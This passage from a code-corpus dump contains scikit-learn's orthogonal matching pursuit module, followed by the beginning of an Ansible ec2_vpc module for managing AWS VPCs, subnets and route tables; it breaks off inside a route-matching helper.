garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
if copy_X:
X = X.copy('F')
else: # even if we are allowed to overwrite, still copy it if bad order
X = np.asfortranarray(X)
min_float = np.finfo(X.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
potrs, = get_lapack_funcs(('potrs',), (X,))
alpha = np.dot(X.T, y)
residual = y
gamma = np.empty(0)
n_active = 0
indices = np.arange(X.shape[1]) # keeping track of swapping
max_features = X.shape[1] if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=X.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=X.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(np.dot(X.T, residual)))
if lam < n_active or alpha[lam] ** 2 < min_float:
# atom already selected or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
# Updates the Cholesky decomposition of X' X
L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
indices[n_active], indices[lam] = indices[lam], indices[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
residual = y - np.dot(X[:, :n_active], gamma)
if tol is not None and nrm2(residual) ** 2 <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
copy_Gram=True, copy_Xy=True, return_path=False):
"""Orthogonal Matching Pursuit step on a precomputed Gram matrix.
    This function uses the Cholesky decomposition method.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data matrix
Xy : array, shape (n_features,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol_0 : float
Squared norm of y, required if tol is not None.
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coefs : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
if copy_Xy:
Xy = Xy.copy()
min_float = np.finfo(Gram.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
potrs, = get_lapack_funcs(('potrs',), (Gram,))
indices = np.arange(len(Gram)) # keeping track of swapping
alpha = Xy
tol_curr = tol_0
delta = 0
gamma = np.empty(0)
n_active = 0
max_features = len(Gram) if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=Gram.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=Gram.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(alpha))
if lam < n_active or alpha[lam] ** 2 < min_float:
# selected same atom twice, or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
if n_active > 0:
L[n_active, :n_active] = Gram[lam, :n_active]
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=3)
break
L[n_active, n_active] = np.sqrt(1 - v)
Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
indices[n_active], indices[lam] = indices[lam], indices[n_active]
Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
beta = np.dot(Gram[:, :n_active], gamma)
alpha = Xy - beta
if tol is not None:
tol_curr += delta
delta = np.inner(gamma, beta[:n_active])
tol_curr -= delta
if abs(tol_curr) <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
copy_X=True, return_path=False,
return_n_iter=False):
"""Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems.
An instance of the problem has the form:
When parametrized by the number of non-zero coefficients using
`n_nonzero_coefs`:
argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}
When parametrized by error using the parameter `tol`:
argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
X : array, shape (n_samples, n_features)
Input data. Columns are assumed to have unit norm.
y : array, shape (n_samples,) or (n_samples, n_targets)
Input targets
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
precompute : {True, False, 'auto'},
Whether to perform precomputations. Improves performance when n_targets
or n_samples is very large.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp_gram
lars_path
decomposition.sparse_encode
Notes
-----
    Orthogonal matching pursuit was introduced in S. G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
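    Examples
    --------
    A minimal illustrative example; the toy dictionary below is made up (its
    columns already have unit norm) and the import path assumes the usual
    scikit-learn layout:
    >>> import numpy as np
    >>> from sklearn.linear_model import orthogonal_mp
    >>> X = np.array([[1., 0.], [0., 1.], [0., 0.]])
    >>> y = np.dot(X, np.array([2., -1.]))
    >>> coef = orthogonal_mp(X, y, n_nonzero_coefs=2)
    >>> coef.shape
    (2,)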
"""
X = check_array(X, order='F', copy=copy_X)
copy_X = False
if y.ndim == 1:
y = y.reshape(-1, 1)
y = check_array(y)
if y.shape[1] > 1: # subsequent targets will be affected
copy_X = True
if n_nonzero_coefs is None and tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > X.shape[1]:
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if precompute == 'auto':
precompute = X.shape[0] > X.shape[1]
if precompute:
G = np.dot(X.T, X)
G = np.asfortranarray(G)
Xy = np.dot(X.T, y)
if tol is not None:
norms_squared = np.sum((y ** 2), axis=0)
else:
norms_squared = None
return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
copy_Gram=copy_X, copy_Xy=False,
return_path=return_path)
if return_path:
coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
else:
coef = np.zeros((X.shape[1], y.shape[1]))
n_iters = []
for k in range(y.shape[1]):
out = _cholesky_omp(
X, y[:, k], n_nonzero_coefs, tol,
copy_X=copy_X, return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if y.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
norms_squared=None, copy_Gram=True,
copy_Xy=True, return_path=False,
return_n_iter=False):
"""Gram Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems using only
the Gram matrix X.T * X and the product X.T * y.
Read more in the :ref:`User Guide <omp>`.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data: X.T * X
Xy : array, shape (n_features,) or (n_features, n_targets)
Input targets multiplied by X: X.T * y
n_nonzero_coefs : int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
norms_squared : array-like, shape (n_targets,)
        Squared L2 norms of the columns of y (one entry per target). Required
        if tol is not None.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
return_n_iter : bool, optional default False
Whether or not to return the number of iterations.
Returns
-------
coef : array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
n_iters : array-like or int
Number of active features across every target. Returned only if
`return_n_iter` is set to True.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp
lars_path
decomposition.sparse_encode
Notes
-----
    Orthogonal matching pursuit was introduced in S. G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
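    Examples
    --------
    A small illustrative sketch of the precomputed quantities this function
    expects; the toy data is made up and the import path assumes the usual
    scikit-learn layout:
    >>> import numpy as np
    >>> from sklearn.linear_model import orthogonal_mp_gram
    >>> X = np.array([[1., 0.], [0., 1.], [0., 0.]])
    >>> y = np.dot(X, np.array([2., -1.]))
    >>> G = np.dot(X.T, X)
    >>> Xy = np.dot(X.T, y)
    >>> coef = orthogonal_mp_gram(G, Xy, n_nonzero_coefs=2)
    >>> coef.shape
    (2,)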
"""
Gram = check_array(Gram, order='F', copy=copy_Gram)
Xy = np.asarray(Xy)
if Xy.ndim > 1 and Xy.shape[1] > 1:
# or subsequent target will be affected
copy_Gram = True
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if tol is not None:
norms_squared = [norms_squared]
if n_nonzero_coefs is None and tol is None:
n_nonzero_coefs = int(0.1 * len(Gram))
if tol is not None and norms_squared is None:
raise ValueError('Gram OMP needs the precomputed norms in order '
'to evaluate the error sum of squares.')
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > len(Gram):
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if return_path:
coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
else:
coef = np.zeros((len(Gram), Xy.shape[1]))
n_iters = []
for k in range(Xy.shape[1]):
out = _gram_omp(
Gram, Xy[:, k], n_nonzero_coefs,
norms_squared[k] if tol is not None else None, tol,
copy_Gram=copy_Gram, copy_Xy=copy_Xy,
return_path=return_path)
if return_path:
_, idx, coefs, n_iter = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx, n_iter = out
coef[idx, k] = x
n_iters.append(n_iter)
if Xy.shape[1] == 1:
n_iters = n_iters[0]
if return_n_iter:
return np.squeeze(coef), n_iters
else:
return np.squeeze(coef)
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
"""Orthogonal Matching Pursuit model (OMP)
Parameters
----------
n_nonzero_coefs : int, optional
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float, optional
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
precompute : {True, False, 'auto'}, default 'auto'
Whether to use a precomputed Gram and Xy matrix to speed up
calculations. Improves performance when `n_targets` or `n_samples` is
very large. Note that if you already have such matrices, you can pass
them directly to the fit method.
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
coef_ : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the formula)
intercept_ : float or array, shape (n_targets,)
independent term in decision function.
n_iter_ : int or array-like
Number of active features across every target.
Notes
-----
    Orthogonal matching pursuit was introduced in S. G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
decomposition.sparse_encode
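    Examples
    --------
    An illustrative toy usage (the data below is made up; the import path
    assumes the usual scikit-learn layout):
    >>> import numpy as np
    >>> from sklearn.linear_model import OrthogonalMatchingPursuit
    >>> X = np.array([[0., 1.], [1., 0.], [1., 1.], [2., 1.]])
    >>> y = np.dot(X, np.array([1., 2.]))
    >>> omp = OrthogonalMatchingPursuit(n_nonzero_coefs=2).fit(X, y)
    >>> omp.predict(X).shape
    (4,)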
"""
def __init__(self, n_nonzero_coefs=None, tol=None, fit_intercept=True,
normalize=True, precompute='auto'):
self.n_nonzero_coefs = n_nonzero_coefs
self.tol = tol
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
n_features = X.shape[1]
X, y, X_mean, y_mean, X_std, Gram, Xy = \
_pre_fit(X, y, None, self.precompute, self.normalize,
self.fit_intercept, copy=True)
if y.ndim == 1:
y = y[:, np.newaxis]
if self.n_nonzero_coefs is None and self.tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
else:
self.n_nonzero_coefs_ = self.n_nonzero_coefs
if Gram is False:
coef_, self.n_iter_ = orthogonal_mp(
X, y, self.n_nonzero_coefs_, self.tol,
precompute=False, copy_X=True,
return_n_iter=True)
else:
norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
coef_, self.n_iter_ = orthogonal_mp_gram(
Gram, Xy=Xy, n_nonzero_coefs=self.n_nonzero_coefs_,
tol=self.tol, norms_squared=norms_sq,
copy_Gram=True, copy_Xy=True,
return_n_iter=True)
self.coef_ = coef_.T
self._set_intercept(X_mean, y_mean, X_std)
return self
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
fit_intercept=True, normalize=True, max_iter=100):
"""Compute the residues on left-out data for a full LARS path
Parameters
-----------
X_train : array, shape (n_samples, n_features)
The data to fit the LARS on
y_train : array, shape (n_samples)
The target variable to fit LARS on
X_test : array, shape (n_samples, n_features)
The data to compute the residues on
y_test : array, shape (n_samples)
The target variable to compute the residues on
copy : boolean, optional
Whether X_train, X_test, y_train and y_test should be copied. If
False, they may be overwritten.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
max_iter : integer, optional
        Maximum number of iterations to perform, and therefore the maximum
        number of features to include. 100 by default.
Returns
-------
residues: array, shape (n_samples, max_features)
Residues of the prediction on the test data
"""
if copy:
X_train = X_train.copy()
y_train = y_train.copy()
X_test = X_test.copy()
y_test = y_test.copy()
if fit_intercept:
X_mean = X_train.mean(axis=0)
X_train -= X_mean
X_test -= X_mean
y_mean = y_train.mean(axis=0)
y_train = as_float_array(y_train, copy=False)
y_train -= y_mean
y_test = as_float_array(y_test, copy=False)
y_test -= y_mean
if normalize:
norms = np.sqrt(np.sum(X_train ** 2, axis=0))
nonzeros = np.flatnonzero(norms)
X_train[:, nonzeros] /= norms[nonzeros]
coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
precompute=False, copy_X=False,
return_path=True)
if coefs.ndim == 1:
coefs = coefs[:, np.newaxis]
if normalize:
coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]
return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
"""Cross-validated Orthogonal Matching Pursuit model (OMP)
Parameters
----------
copy : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
max_iter : integer, optional
        Maximum number of iterations to perform, and therefore the maximum
        number of features to include. 10% of ``n_features`` but at least 5
        if available.
cv : cross-validation generator, optional
see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
a 5-fold strategy
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs
verbose : boolean or integer, optional
Sets the verbosity amount
Read more in the :ref:`User Guide <omp>`.
Attributes
----------
intercept_ : float or array, shape (n_targets,)
Independent term in decision function.
coef_ : array, shape (n_features,) or (n_features, n_targets)
Parameter vector (w in the problem formulation).
n_nonzero_coefs_ : int
Estimated number of non-zero coefficients giving the best mean squared
error over the cross-validation folds.
n_iter_ : int or array-like
Number of active features across every target for the model refit with
the best hyperparameters got by cross-validating across all folds.
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
OrthogonalMatchingPursuit
LarsCV
LassoLarsCV
decomposition.sparse_encode
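    Examples
    --------
    A rough usage sketch on random toy data (illustrative only; the import
    path assumes the usual scikit-learn layout):
    >>> import numpy as np
    >>> from sklearn.linear_model import OrthogonalMatchingPursuitCV
    >>> rng = np.random.RandomState(0)
    >>> X = rng.randn(60, 10)
    >>> y = np.dot(X[:, :3], np.array([1., 2., -1.]))
    >>> model = OrthogonalMatchingPursuitCV(cv=3).fit(X, y)
    >>> 1 <= model.n_nonzero_coefs_ <= 10
    True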
"""
def __init__(self, copy=True, fit_intercept=True, normalize=True,
max_iter=None, cv=None, n_jobs=1, verbose=False):
self.copy = copy
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape [n_samples, n_features]
Training data.
y : array-like, shape [n_samples]
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X, y = check_X_y(X, y, y_numeric=True)
X = as_float_array(X, copy=False, force_all_finite=False)
cv = check_cv(self.cv, X, y, classifier=False)
max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
if not self.max_iter
else self.max_iter)
cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_omp_path_residues)(
X[train], y[train], X[test], y[test], self.copy,
self.fit_intercept, self.normalize, max_iter)
for train, test in cv)
min_early_stop = min(fold.shape[0] for fold in cv_paths)
mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
for fold in cv_paths])
best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
self.n_nonzero_coefs_ = best_n_nonzero_coefs
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
fit_intercept=self.fit_intercept,
normalize=self.normalize)
omp.fit(X, y)
self.coef_ = omp.coef_
self.intercept_ = omp.intercept_
self.n_iter_ = omp.n_iter_
return self
| bsd-3-clause | 2,974,351,446,800,531,500 | 34.784706 | 79 | 0.602328 | false |
davidobrien1985/ansible-modules-core | cloud/amazon/ec2_vpc.py | 6 | 29668 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc
short_description: configure AWS virtual private clouds
description:
    - Creates or terminates AWS virtual private clouds. This module has a dependency on python-boto.
version_added: "1.4"
options:
cidr_block:
description:
- "The cidr block representing the VPC, e.g. 10.0.0.0/16"
required: false, unless state=present
instance_tenancy:
description:
- "The supported tenancy options for instances launched into the VPC."
required: false
default: "default"
choices: [ "default", "dedicated" ]
dns_support:
description:
- toggles the "Enable DNS resolution" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
dns_hostnames:
description:
- toggles the "Enable DNS hostname support for instances" flag
required: false
default: "yes"
choices: [ "yes", "no" ]
subnets:
description:
- 'A dictionary array of subnets to add of the form: { cidr: ..., az: ... , resource_tags: ... }. Where az is the desired availability zone of the subnet, but it is not required. Tags (i.e.: resource_tags) is also optional and use dictionary form: { "Environment":"Dev", "Tier":"Web", ...}. All VPC subnets not in this list will be removed as well. As of 1.8, if the subnets parameter is not specified, no existing subnets will be modified.'
required: false
default: null
resource_tags: See resource_tags for VPC below. The main difference is subnet tags not specified here will be deleted.
vpc_id:
description:
- A VPC id to terminate when state=absent
required: false
default: null
resource_tags:
description:
- 'A dictionary array of resource tags of the form: { tag1: value1, tag2: value2 }. Tags in this list are used in conjunction with CIDR block to uniquely identify a VPC in lieu of vpc_id. Therefore, if CIDR/Tag combination does not exist, a new VPC will be created. VPC tags not on this list will be ignored. Prior to 1.7, specifying a resource tag was optional.'
required: true
version_added: "1.6"
internet_gateway:
description:
- Toggle whether there should be an Internet gateway attached to the VPC
required: false
default: "no"
choices: [ "yes", "no" ]
route_tables:
description:
      - 'A dictionary array of route tables to add of the form: { subnets: [172.22.2.0/24, 172.22.3.0/24,], routes: [{ dest: 0.0.0.0/0, gw: igw},], resource_tags: ... }. Where the subnets list is those subnets the route table should be associated with, and the routes list is a list of routes to be in the table. The special keyword igw for gw specifies that the route should go through the internet gateway attached to the VPC. gw also accepts instance-ids, interface-ids, and vpc-peering-connection-ids in addition to igw. resource_tags is optional and uses dictionary form: { "Name": "public", ... }. This module is currently unable to affect the "main" route table due to some limitations in boto, so you must explicitly define the associated subnets or they will be attached to the main table implicitly. As of 1.8, if the route_tables parameter is not specified, no existing routes will be modified.'
required: false
default: null
wait:
description:
- wait for the VPC to be in state 'available' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
state:
description:
- Create or terminate the VPC
required: true
choices: [ "present", "absent" ]
author: "Carson Gee (@carsongee)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic creation example:
ec2_vpc:
state: present
cidr_block: 172.23.0.0/16
resource_tags: { "Environment":"Development" }
region: us-west-2
# Full creation example with subnets and optional availability zones.
# The absence or presence of subnets deletes or creates them respectively.
ec2_vpc:
state: present
cidr_block: 172.22.0.0/16
resource_tags: { "Environment":"Development" }
subnets:
- cidr: 172.22.1.0/24
az: us-west-2c
resource_tags: { "Environment":"Dev", "Tier" : "Web" }
- cidr: 172.22.2.0/24
az: us-west-2b
resource_tags: { "Environment":"Dev", "Tier" : "App" }
- cidr: 172.22.3.0/24
az: us-west-2a
resource_tags: { "Environment":"Dev", "Tier" : "DB" }
internet_gateway: True
route_tables:
- subnets:
- 172.22.2.0/24
- 172.22.3.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
- subnets:
- 172.22.1.0/24
routes:
- dest: 0.0.0.0/0
gw: igw
region: us-west-2
register: vpc
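# Another creation variation (illustrative values only) exercising the DNS
# attribute flags documented above:
ec2_vpc:
        state: present
        cidr_block: 172.24.0.0/16
        resource_tags: { "Environment":"Test" }
        dns_support: yes
        dns_hostnames: no
        region: us-west-2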
# Removal of a VPC by id
ec2_vpc:
state: absent
vpc_id: vpc-aaaaaaa
region: us-west-2
If you have added elements not managed by this module, e.g. instances, NATs, etc., then
the delete will fail until those dependencies are removed.
'''
import time
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_vpc_info(vpc):
"""
Retrieves vpc information from an instance
ID and returns it as a dictionary
"""
return({
'id': vpc.id,
'cidr_block': vpc.cidr_block,
'dhcp_options_id': vpc.dhcp_options_id,
'region': vpc.region.name,
'state': vpc.state,
})
def find_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Finds a VPC that matches a specific id or cidr + tags
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A VPC object that matches either an ID or CIDR and one or more tag values
"""
    if vpc_id is None and cidr is None:
module.fail_json(
msg='You must specify either a vpc_id or a cidr block + list of unique tags, aborting'
)
found_vpcs = []
resource_tags = module.params.get('resource_tags')
# Check for existing VPC by cidr_block or id
if vpc_id is not None:
found_vpcs = vpc_conn.get_all_vpcs(None, {'vpc-id': vpc_id, 'state': 'available',})
else:
previous_vpcs = vpc_conn.get_all_vpcs(None, {'cidr': cidr, 'state': 'available'})
for vpc in previous_vpcs:
# Get all tags for each of the found VPCs
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
# If the supplied list of ID Tags match a subset of the VPC Tags, we found our VPC
if resource_tags and set(resource_tags.items()).issubset(set(vpc_tags.items())):
found_vpcs.append(vpc)
found_vpc = None
if len(found_vpcs) == 1:
found_vpc = found_vpcs[0]
if len(found_vpcs) > 1:
module.fail_json(msg='Found more than one vpc based on the supplied criteria, aborting')
return (found_vpc)
def routes_match(rt_list=None, rt=None, igw=None):
"""
Check if the route table has all routes as in given list
rt_list : A list if routes provided in the module
rt : The Remote route table object
igw : The internet gateway object for this vpc
Returns:
        True when the provided routes and the remote routes are the same.
        False when the provided routes and the remote routes are different.
"""
local_routes = []
remote_routes = []
for route in rt_list:
route_kwargs = {
'gateway_id': None,
'instance_id': None,
'interface_id': None,
'vpc_peering_connection_id': None,
'state': 'active'
}
if route['gw'] == 'igw':
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
route_kwargs['destination_cidr_block'] = route['dest']
local_routes.append(route_kwargs)
for j in rt.routes:
remote_routes.append(j.__dict__)
match = []
for i in local_routes:
change = "false"
for j in remote_routes:
if set(i.items()).issubset(set(j.items())):
